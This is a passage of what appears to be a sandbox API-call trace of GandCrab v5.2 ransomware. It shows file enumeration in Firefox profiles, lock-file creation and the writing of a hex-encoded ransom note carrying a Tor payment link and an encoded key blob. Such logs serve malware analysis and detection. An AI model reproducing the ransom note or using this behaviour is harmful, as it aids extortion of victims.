x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0079.961] WriteFile (in: hFile=0x2c4, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259eab8, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259eab8*=0x2162, lpOverlapped=0x0) returned 1 [0079.962] CloseHandle (hObject=0x2c4) returned 1 [0079.962] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.962] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0079.963] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x19, wMilliseconds=0x118)) [0079.963] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.963] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0079.963] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0079.963] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\d2ca4a09d2ca4deb61a.lock") returned 87 [0079.963] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2c4 [0079.965] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.965] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.965] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\") returned 63 [0079.965] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*" [0079.965] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*", fInfoLevelId=0x1, lpFindFileData=0x259ead4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ead4) returned 0x5034f8 [0079.965] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.965] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0079.966] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.966] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.966] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0079.966] lstrcmpW (lpString1="8i341t8m.default", lpString2=".") returned 1 [0079.966] lstrcmpW (lpString1="8i341t8m.default", lpString2="..") returned 1 [0079.966] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\", lpString2="8i341t8m.default" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default" [0079.966] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\" [0079.966] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0079.966] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0079.966] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0079.966] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0079.966] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0079.967] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0079.967] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0079.967] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0079.967] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0079.967] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.967] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0079.967] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\\\TITWMVJL-DECRYPT.txt") returned 101 [0079.967] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0079.970] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x